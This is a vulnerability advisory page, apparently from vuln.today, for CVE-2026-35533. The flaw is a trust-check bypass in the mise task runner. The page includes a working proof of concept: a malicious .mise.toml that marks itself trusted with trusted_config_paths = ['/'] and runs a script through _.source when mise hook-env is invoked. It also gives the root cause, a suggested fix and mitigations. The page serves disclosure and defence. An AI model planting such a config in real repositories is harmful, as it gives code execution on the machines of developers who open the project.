Skip to main content

Docker CVE-2026-35533

| EUVDEUVD-2026-19952 HIGH
Improper Access Control (CWE-284)
2026-04-07 https://github.com/jdx/mise GHSA-436v-8fw5-4mj8
7.7
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.7 HIGH
AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
Attack Vector
Local
Attack Complexity
High
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

4
Re-analysis Queued
Apr 15, 2026 - 20:37 vuln.today
cvss_changed
EUVD ID Assigned
Apr 07, 2026 - 20:16 euvd
EUVD-2026-19952
Analysis Generated
Apr 07, 2026 - 20:16 vuln.today
CVE Published
Apr 07, 2026 - 20:13 nvd
HIGH 7.7

DescriptionGitHub Advisory

Summary

mise loads trust-control settings from a local project .mise.toml before the trust check runs. An attacker who can place a malicious .mise.toml in a repository can make that same file appear trusted and then reach dangerous directives such as [env] _.source, templates, hooks, or tasks.

The strongest current variant is trusted_config_paths = ["/"]. I confirmed on current v2026.3.17 in Docker that this causes an untrusted project config to become trusted during mise hook-env, which then executes an attacker-controlled _.source script. The same preload issue also lets local yes = true / ci = true auto-approve trust prompts on v2026.2.18+, but the primary PoC below uses the stronger trusted_config_paths path.

Details

The vulnerable load order is:

  1. Settings::try_get() preloads local settings files.
  2. parse_settings_file() returns settings_file.settings without checking whether the file is trusted.
  3. trust_check() later consults those already-loaded settings.

The main trust-bypass path is in is_trusted():

rust
let settings = Settings::get();
for p in settings.trusted_config_paths() {
    if canonicalized_path.starts_with(p) {
        add_trusted(canonicalized_path.to_path_buf());
        return true;
    }
}

If a local project file sets:

toml
[settings]
trusted_config_paths = ["/"]

then every absolute path matches, so the same untrusted file is marked trusted before the dangerous-directive guard is reached.

Related variant: trust_check() auto-accepts explicit trust prompts when Settings::get().yes is true, and Settings::try_get() sets yes = true when ci is set. I confirmed that regression on v2026.2.18, but the primary PoC below does not depend on it.

PoC

Test environment:

  • Docker
  • linux-arm64
  • mise v2026.3.17

Negative control:

toml
[env]
_.source = ["./poc.sh"]

mise ls fails with:

text
Config files in /work/poc/.mise.toml are not trusted.

and /tmp/mise-proof.txt is not created.

Primary exploit:

toml
[settings]
trusted_config_paths = ["/"]

[env]
_.source = ["./poc.sh"]

with:

bash
#!/usr/bin/env bash
echo trusted_paths_hookenv > /tmp/mise-proof.txt

Then:

bash
mise hook-env -s bash --force

Observed:

text
/tmp/mise-proof.txt => trusted_paths_hookenv

Related regression check:

  • v2026.2.17: local yes = true does not bypass trust
  • v2026.2.18: the same local yes = true value auto-approves the trust prompt and the side effect file is created

Impact

An attacker who can place a .mise.toml in a repository can make mise trust and evaluate dangerous directives from that same untrusted file.

Demonstrated on current supported versions:

  • execution via [env] _.source during mise hook-env
  • bypass of the protection that mise trust is supposed to provide for dangerous config features

On newer versions, the same root cause also lets local yes / ci values auto-approve explicit trust prompts.

Suggested Fix

Do not honor trust-control settings from non-global project config files.

At minimum, ignore these fields when loading local project config:

  • trusted_config_paths
  • yes
  • ci
  • paranoid

For example:

rust
pub fn parse_settings_file(path: &Path) -> Result<SettingsPartial> {
    let raw = file::read_to_string(path)?;
    let settings_file: SettingsFile = toml::from_str(&raw)?;
    let mut settings = settings_file.settings;

    if !config::is_global_config(path) {
        settings.yes = None;
        settings.ci = None;
        settings.trusted_config_paths = None;
        settings.paranoid = None;
    }

    Ok(settings)
}

AnalysisAI

Local trust-control bypass in mise (Rust task runner) versions ≤2026.3.17 allows attackers to inject malicious configuration through .mise.toml files, leading to arbitrary code execution. By setting trusted_config_paths = ["/"] in a project-local config file, attackers bypass the trust verification mechanism that should prevent execution of dangerous directives like [env] _.source, hooks, templates, and tasks. Exploitation requires victim interaction (cloning/opening a malicious repository), but no authentication. EPSS data not available; no confirmed active exploitation or public exploit code beyond the GitHub advisory's proof-of-concept. Attack complexity is high due to the requirement for victim action and specific execution context (mise hook-env invocation).

Technical ContextAI

The vulnerability stems from a time-of-check-to-time-of-use (TOCTOU) race in mise's configuration loading sequence. The Settings::try_get() function preloads local .mise.toml settings files before trust_check() validates whether the configuration source should be trusted. The is_trusted() function consults Settings::get().trusted_config_paths() to determine if a config file is in a trusted location, but this setting has already been populated from the untrusted local file itself. This creates a circular trust: the attacker-controlled .mise.toml defines its own trust boundary (e.g., trusted_config_paths = ["/"] to trust all absolute paths), which is then used to validate that same file. The CWE-284 (Improper Access Control) classification reflects this failure to enforce consistent trust boundaries across configuration sources. Additional regression variants allow local yes=true or ci=true settings to auto-approve trust prompts introduced in v2026.2.18, though the primary exploit path works across all versions through v2026.3.17.

RemediationAI

Upgrade to the patched version of mise once released by the vendor. The upstream GitHub advisory at github.com/jdx/mise/security/advisories/GHSA-436v-8fw5-4mj8 should be monitored for patch availability and the specific fixed version number. The suggested fix involves modifying the parse_settings_file() function to strip trust-control fields (trusted_config_paths, yes, ci, paranoid) from non-global configuration sources before they are used in trust validation. Until a patch is available, mitigation strategies include: manually auditing .mise.toml files in untrusted repositories before running mise commands; restricting mise usage to trusted codebases only; implementing organizational policies requiring code review of .mise.toml changes; and avoiding automatic mise hook-env execution in shell initialization when working with untrusted projects. Consider temporarily disabling mise shell integration (removing mise activate from shell profiles) and using explicit mise trust commands only after manual configuration review. Organizations should inventory all systems with mise installed and prepare for coordinated patching once the fix is released.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Share

CVE-2026-35533 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy